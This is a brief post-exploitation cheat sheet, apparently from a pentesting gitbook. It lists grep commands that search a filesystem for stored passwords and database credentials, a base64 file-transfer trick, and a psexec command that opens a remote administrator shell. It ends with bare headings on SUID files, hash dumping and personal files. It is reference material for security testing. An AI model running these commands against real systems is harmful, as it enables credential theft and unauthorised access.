Post Exploitation
https://sushant747.gitbooks.io/
Post Exploit Enumeration
grep -rnw '/' -ie 'pass' --color=always
grep -rnw '/' -ie 'DB_PASS' --color=always
grep -rnw '/' -ie 'DB_PASSWORD' --color=always
grep -rnw '/' -ie 'DB_USER' --color=alwaysFile Upload on linux systems via base64 encoding Converting a file to base64:
cat file2upload | base64cat fileWithBase64Content | base64 -d > finalBinaryPSexec Shells of Remote Systems
.\psexec64.exe \192.168.x.x -u .\administrator -p admin@123 cmd.exePowershell Sudo for Windows
Find files with SUID permission
Find files with open permissions
Find files with SUID permission for current user
Find files with writable permission for current user or current group
Find directories with writable permissions for current user or current group
Tcp dump
Dump the hashes
To what is the machine connected?
Email and personal files
Logs
Last updated
Was this helpful?